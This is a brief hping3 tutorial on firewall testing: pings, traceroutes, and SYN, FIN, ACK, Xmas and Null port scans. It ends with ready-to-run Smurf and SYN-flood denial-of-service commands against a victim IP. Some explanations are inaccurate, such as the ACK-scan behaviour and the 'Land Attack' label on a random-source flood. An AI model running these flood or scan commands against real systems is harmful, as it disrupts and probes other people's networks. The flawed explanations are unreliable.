Testing firewall rules with Hping3

1. Testing ICMP: In this example hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply

hping3 -1 testpage.com

2. Traceroute using ICMP: This example is similar to famous utilities like tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.

hping3 — traceroute -V -1 testpage.com

3. Checking port: Here hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).

hping3 -V -S -p 80 -s 5050 testpage.com

4. Traceroute to a determined port: A nice feature from Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked. It can just be done by adding — traceroute to the last command.

hping3 — traceroute -V -S -p 80 -s 5050 testpage.com

5. Other types of ICMP: This example sends a ICMP address mask request ( Type 17 ).

hping3 -c 1 -V -1 -C 17 testpage.com

6. Other types of Port Scanning: First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..

hping3 -c 1 -V -p 80 -s 5050 -F testpage.com

7. Ack Scan: This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.

hping3 -c 1 -V -p 80 -s 5050 -A testpage.com

8. Xmas Scan: This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device’s TCP port is closed, the target device sends a TCP RST packet in reply. If the target device’s TCP port is open, the target discards the TCP Xmas scan, sending no reply.

hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF testpage.com

9. Null Scan: This scan sets the sequence number to zero and have no flags set in the packet. If the target device’s TCP port is closed, the target device sends a TCP RST packet in reply. If the target device’s TCP port is open, the target discards the TCP NULL scan, sending no reply.

hping3 -c 1 -V -p 80 -s 5050 -Y testpage.com

10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

hping3 -1 — flood -a VICTIM_IP BROADCAST_ADDRESS

11. DOS Land Attack:

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 — flood — rand-source VICTIM_IP
Legend:
 — flood: sent packets as fast as possible. Don’t show replies.
 — rand-dest: random destionation address mode. see the man.
 -V ← Verbose
 -c — count: packet count
 -d — data: data size
 -S — syn: set SYN flag
 -w — win: winsize (default 64)
 -p — destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
 -s — baseport: base source port (default random)